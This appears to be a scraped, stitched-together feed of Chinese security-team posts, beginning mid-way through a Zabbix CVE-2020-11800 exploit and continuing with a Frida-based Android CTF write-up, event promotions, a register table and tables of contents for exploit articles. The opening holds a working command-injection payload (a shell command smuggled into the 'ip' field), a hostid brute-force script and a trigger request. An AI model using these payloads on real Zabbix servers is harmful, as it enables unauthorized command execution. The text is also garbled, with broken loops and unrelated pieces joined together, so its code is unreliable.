{"request":"activechecks","host":"helloworld","ip":"ffff:::;touch/tmp/1234pwn"}
 
 
执行以上trapper命令，利用自动注册添加host
 
暴破hostid
 
利用command命令字，暴破得到上一步添加的host的id
def hostid_bruteforce():
 
for ip in ipList:
 
try:
 
for i in range(10000, 20000):
 
cmd_fmt ='{"request":"command","scriptid":"3","hostid":"%d","nodeid":"0"}'cmd = cmd_fmt%i
 
rsp = doCmd(ip, cmd)
 
try:
 
r = json.loads(rsp)['response']
 
if r == 'success':
 
print 'hostid = %d' % i
 
except Exception as e:
 
print e
 
except Exception as e:
 
print e

触发命令注入
 
 
{"request":"command","scriptid":"1","hostid":"10106","nodeid":"0"}
 
 
执行ping命令，在server主机生成/tmp/1234pwn文件，注入成功。


修复建议 

正确限制IP 

附录 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11800
https://support.zabbix.com/browse/ZBX-17600
https://support.zabbix.com/browse/ZBXSEC-30





阅读原文
跳转微信打开



巧用frida快速破解Android类CTF题目
Tue, 15 Dec 2020 15:35:00 +0800

原创 St小龙 2020-12-15 15:35 


教你如何在CTF大赛中快速的解出安卓破解类题目









在现在的CTF比赛赛制中，前三名解出题目的队伍都会有额外加分，如何快速的解出问题，对于参赛选手来说至关重要。因为往往就是一分之差，淘汰多支队伍。
 
我们以最近一道CTF 安卓题目为例，利用frida工具我们拿到了二血，今天我来分享一下，如何快速的capture apk’s flag
 
首先jeb来加载hw02.apk，jeb工具可自行下载
 
这里可以根据Manifest来分析出apk的主入口activity，这里是MainActivity
Input 变量为用户的输入，从上图代码所示，判断input输入的字符串格式 “flag{”开头 ， “}” 结尾。字符串长度不能低于10。否则会报错 tryagain~ 或者 flag format error ~
 
重点逻辑在  this.checkFlag 这个native函数，它的处理逻辑在so层，输入的参数就是 flag{xxx}中间的那坨xxx。
 
 
将apk解压缩，发现有两个架构的so文件，我们的测试机是64位的，那就从arm64-v8a里获取so吧
使用ida工具来分析libcheckflag.so文件
看到init_array 有初始化的过程
这里会修改.bss段变量的值。暂时不管。
JNI_OnLoad 函数对 checkFlag函数进行动态注册了
主要的逻辑在于这里sub_DD78函数了
看第一个箭头，v13代表字符串的长度，这里v13 长度需要超过15，低于15长度就直接退出了。
 
第二个箭头处Sub_DFC8是干嘛的？跟进去
GetStringUTFChars是将java层传入的jstring转化为char*, 这里我们简单的理解就是获取用户输入的字符串的。我们知道GetStringUTFChars有三个参数，这里ida对函数优化之后，没有显示任何参数。右键选择”Force call type”，就可以看到三个参数了。
接下来，我们只需要关注下面的三个重要的函数，经过这三个函数的运算之后，会产生一个新的值，固定值"bb4ME6An/z82AwX5r0FXgwJwzp3JaFgW7JtmKc4T9Q=="进行strcmp对比。相同就可以返回true了

sub_E018 我们来看一下函数内部逻辑
sub_E56C
sub_E7F8 这个函数巨复杂，直接分析变得不可能且会耗费大量的时间
综上所述，这三个函数内部逻辑都很复杂，如果直接去逆推，需要花很长时间，这里我们采用frida工具来帮助我们快速的解题。
 
Hook函数实现代码
var libhm  = Process.findModuleByName("libcheckflag.so");
        if(libhm != undefined)
        {
             var modulebase = libhm.base;
             console.log("base:"+modulebase);
             var sub_E018 = modulebase.add(0xE018);
             var sub_E56C = modulebase.add(0xE56C);
             var sub_E7F8 = modulebase.add(0xE7F8);
             
            Interceptor.attach(sub_E018,{
                   onEnter: function(args){
                       //console.log(Memory.readCString(args[0]));
                   },
               onLeave: function(retval){
                   //console.log("retval:"+retval);
                   //Memory.readUtf8String(retval);
                   //retval.replace(1)
                   }
               });
              
               Interceptor.attach(sub_E56C,{
                   onEnter: function(args){
                       //console.log(Memory.readCString(args[0]));
                   },
              
               onLeave: function(retval){
                   //console.log("retval:"+retval);
                   //Memory.readUtf8String(retval);
                   //retval.replace(1)
                   }
               });
               Interceptor.attach(sub_E7F8,{
                   onEnter: function(args){
                       //console.log(Memory.readCString(args[0]));
                   },
               onLeave: function(retval){
                   console.log("retval:"+retval);
                   var data = Memory.readUtf8String(retval);
               var result = “bb4ME6An/z82AwX5r0FXgwJwzp3JaFgW7JtmKc4T9Q==”;
 
                   var index= (round-1) *4;
                   var result1 =result.substring(index,index+4);
                   if(data.substring(index,index+4) == result1)
                   {
               console.log("[+]Found:"+Memory.readUtf8String(retval));
                   }
                   //retval.replace(1)
                   }
               });
}
 
Frida hook了这些关键的函数之后，我们就可以看到函数的输入参数，和输出结果。
我们尝试输入不同的字符来看输出情况
最终得出结论：Input输入的字符长度，除去flag{} 之外有31位时，计算出的结果才和
bb4M E6An /z82 AwX5 r0FX gwJw zp3J aFgW7Jtm Kc4 T9Q== 一样长，这个长度是线性增加的，可以采用爆破的方法。而且每输入3个字符，对应输出结果的4个字符。
 
所以我们先找第一个三字符   xyz  对应  bb4M
第二组 三字符 xyz 对应E6An ，那这里我们以第二组为例，第一组我们爆破出来为qeo
注意上面hook函数中的var index = (round-1)*4;这里的round对应的是第几组。
 
爆破函数实现代码
var MainActivity$1= Java.use("com.ssj.hw02.MainActivity$1");
    var MainActivity = Java.use("com.ssj.hw02.MainActivity");
    var ma = MainActivity.$new()
        MainActivity$1.onClick.implementation =function(){
            for(var j =0; j 
                {
                for(var i =0; i 
                    {
                       for(var k =0; k 
                       {
                       var data = "qeo"+pool[j]+pool[i]+pool[k]+"1111111111111111111111111";
                       console.log(data);
                       ma.checkFlag(data);
                       }
                    }
                }
        }
这样就可以知道第二轮的3字符为irk
我们再重新设置爆破函数中的变量  var data = "qeoirk"+pool[j]+pool[i]+pool[k]+"1111111111111111111111";
将hook函数中的round=3
以此类推，将所有的字符全部猜解出。
 
qeoirklnxcvxfgiefhdweruoulksdnm
最终提交的flag为 flag{ qeoirklnxcvxfgiefhdweruoulksdnm}
 
这样就可以快速的爆破出所有的字符了，省去了大量的中间逆向和逻辑细节了，帮助你快速破解此类题目。





阅读原文
跳转微信打开



礼贺中秋|银针嘉宾召集令，美酒香蜜贺中秋
Fri, 25 Sep 2020 14:55:00 +0800

小仙女 2020-09-25 14:55 


银针嘉宾中秋福利来袭！转发并附上你银针安全沙龙的评价，送中秋礼盒~！









自从银针在端午送出了莫塞尔·夏乐礼盒后
小仙女算是打开了粉丝福利的大门
一到过节 就想着该送点什么来答谢我们银针的忠实粉丝

不过 临近中秋我才发现
这世上最尴尬的事儿就是
礼盒备好了 咋送没想好
生性洒（lan）脱（duo）的小仙女 
在 中秋假期前的最后一个周五
终于鼓足勇气
非常强（xin）硬（xu）的跟老板说
我觉得吧....
我们这种纯技术流的安全团队
送福利风格就该简单直接
不搞那些弯弯绕绕的门槛
是吧老板
沉迷工作的老板听到我如此理直气壮的提议
迷茫的眼神中透着一丝惊讶

也许是我眼神中的坚毅感动了老板
也许是连续的工作扰乱了他正常的思绪
他竟然觉得我的提议
貌似有那么一丝道理
所以！
今年的中秋！
是只给银针嘉宾的 纯！福！利！
除了小仙女我的KPI，不掺杂任何其他因素
【参与方式】
银针安全沙龙南京站、成都站、松山湖站的嘉宾
关注公众号并转发本篇文章至朋友圈
附带你对银针安全沙龙的真（wu）实（xing）感（hao）受（ping）
截图发送至公众号后台 
我们将随机抽取6位嘉宾 随机送出
3份莫塞尔·秋颂礼盒 
3份莫塞尔·勇敢的心礼盒

截图反馈截止时间：9月29日 18:00

【偷偷附个广告】
应广大技术爱好者的墙裂要求
银针安全沙龙将在今年年末 再次来袭
具体时间地点请关注公众号最新消息哦











阅读原文
跳转微信打开



参与有礼|银针安全沙龙松山湖站满意度调查
Tue, 18 Aug 2020 14:20:00 +0800

小仙女 2020-08-18 14:20 


参与调查并回复您对银针安全沙龙的建议，赢华为开发者大会门票！









完成本次调查并在后台回复您参与本次沙龙的感受和您对银针安全沙龙的建议，我们将随机抽取1位嘉宾送出1张HDC（华为开发者大会）门票！（仅限本次松山湖站参会嘉宾）
您的建议是我们前进的最大动力，期待收到您的回复~！



阅读原文
跳转微信打开



文末福利|银针安全沙龙松山湖站精彩回顾，冰蝎3.0内测版发布
Mon, 17 Aug 2020 00:34:00 +0800

原创 小仙女 2020-08-17 00:34 


冰蝎3.0内测版抢先来袭，戳文末获取地址！









2020年8月15日，银针安全沙龙松山湖站在充满夏日风情的欧洲小镇顺利举办，沙龙现场汇集了60位攻防经验丰富的一线安全研究员，嘉宾覆盖广东、深圳、东莞各地，甚至有被议题吸引，不远千里前来赴约的大佬，感谢各位嘉宾与我们共同完成了这场以技术为名的盛夏之约。
说起对本次沙龙的感受，最让人印象深刻的评价就是——“太干了“，银针安全沙龙的主旨就是以攻防渗透为主题的闭门邀请制沙龙，本次沙龙的内容覆盖渗透工具、生物认证、二级制攻防、云主机逃逸、OAuth2、Java进程注入、HMS安全攻防等7个方向，层层筛选的议题，从各个维度带给大家最新的攻防技术和研究成果。每个议题的讨论环节，在场的嘉宾更是参与感满满，现场讨论气氛热烈到停不下来，讨论时长甚至险些超过议题时间，感谢7位优秀的讲师和嘉宾共同完成的这场安全技术的头脑风暴。
除了干货满满的议题，我们还在沙龙设置了茶歇和晚宴环节，给在场的技术大牛们创造了更多交流的环境，在轻松愉悦的氛围中分享对攻防技术和现场议题的体验和感受，以技术为桥梁建立情感的链接。
【沙龙剪影】

银针安全沙龙是以攻防实战为主题的邀请制闭门安全沙龙，目前已经在南京、成都、深圳三地举办了三场，场场爆满场场干货，两年来，我们凭借参与嘉宾的口碑在安全技术沙龙圈有了一点小小的声誉。感谢所有参与的讲师和嘉宾。未来，我们会更加努力，为大家带来更多专注攻防实战的技术议题！

文末福利：冰蝎3.0内测版地址如下：
https://github.com/rebeyond/Behinder/releases/



阅读原文
跳转微信打开



议题发布|银针安全沙龙松山湖站议程正式发布~风里雨里我们在欧洲小镇等你~
Mon, 10 Aug 2020 11:08:00 +0800

小仙女 2020-08-10 11:08 


8月15日，银针安全沙龙松山湖站议程正式发布~风里雨里我们在欧洲小镇等你~欧洲小镇，我们来啦~！









8月15日，欧洲小镇，我们来啦~！




阅读原文
跳转微信打开

Register	状态	含义
RAX	易失的	返回值寄存器
RCX	易失的	第一个整型参数
RDX	易失的	第二个整型参数
R8	易失的	第三个整型参数
R9	易失的	第四个整型参数
R10:R11	易失的	必须根据需要由调用方保留；在 syscall/sysret 指令中使用
R12:R15	非易失的	必须由被调用方保留
RDI	非易失的	必须由被调用方保留
RSI	非易失的	必须由被调用方保留
RBX	非易失的	必须由被调用方保留
RBP	非易失的	可用作帧指针；必须由被调用方保留
RSP	非易失的	堆栈指针
XMM0	易失的	第一个 FP 参数
XMM1	易失的	第二个 FP 参数
XMM2	易失的	第三个 FP 参数
XMM3	易失的	第四个 FP 参数
XMM4:XMM5	易失的	必须根据需要由调用方保留
XMM6:XMM15	非易失的	必须根据需要由被调用方保留

SilverNeedleLab

BIG-IP(CVE-2022-1388)从修复方案分析出exp

3 漏洞复现

从一道CTF浅尝V8源码

目录

1.GoogleCTF 2018 - Pwn Just-In-Time

2.调试环境环境搭建

3.题目漏洞分析

4.从失败的POC读V8

5.Exploit

参考

正文

Pwn Just-In-Time

环境搭建

补丁分析

漏洞分析

IEEE-754编码浮点数精度丢失

题目漏洞

从失败的POC分析V8源码

（1）JIT入口代码浅析

（2）GraphBuilderPhase

（3）TyperPhase

(3-1) SpeculativeNumberAdd node

(3-2) JSCall node

(3-3) NumberConstant node

（4）TypedLoweringPhase

（5）SimplifiedLowering Phase

成功的POC

Exploitation

（1）Corrupting a JSArray

（2）Getting fake object

（3）Arbitrary read/write primitive

（4）Overwriting WASM RWX memory

（5）Exploit

参考

安全对抗，从统计学到人工智能（一）

统计学是什么

一个例子

一些基本概念

同质

变异

个体

总体

样本

抽样

统计量

参数

误差

变量

总结

参考

DirtyPIPE漏洞分析从0到1

1. 环境搭建

1）编译内核

2）编译bzbox

2. 复现问题

3. 分析

1）结论

2）补丁信息

3）创建带PIPE_BUF_FLAG_CAN_MERGE的空pipe_buf

4）利用splice的零拷贝绑定pipe_buf->page到page_cache

5）越权写

4. 参考

References

Log4j2系列漏洞分析汇总

1.1 日志框架

1.2 Log4j2的使用

二、CVE-2021-44228

2.1 漏洞信息

2.2 漏洞原理

2.3 漏洞复现

2.4 漏洞分析

2.5 WAF绕过&数据外带

2.6 2.15.0-rc1版本修复

2.7 2.15.0-rc1修复绕过

2.8 2.15.0-rc2版本修复

三、CVE-2021-45046

3.1 漏洞信息

3.2 漏洞原理

3.3 漏洞复现（DoS）

`（2）GraphBuilderPhase`

3）创建带`PIPE_BUF_FLAG_CAN_MERGE`的空pipe_buf

4）利用`splice`的零拷贝绑定pipe_buf->page到page_cache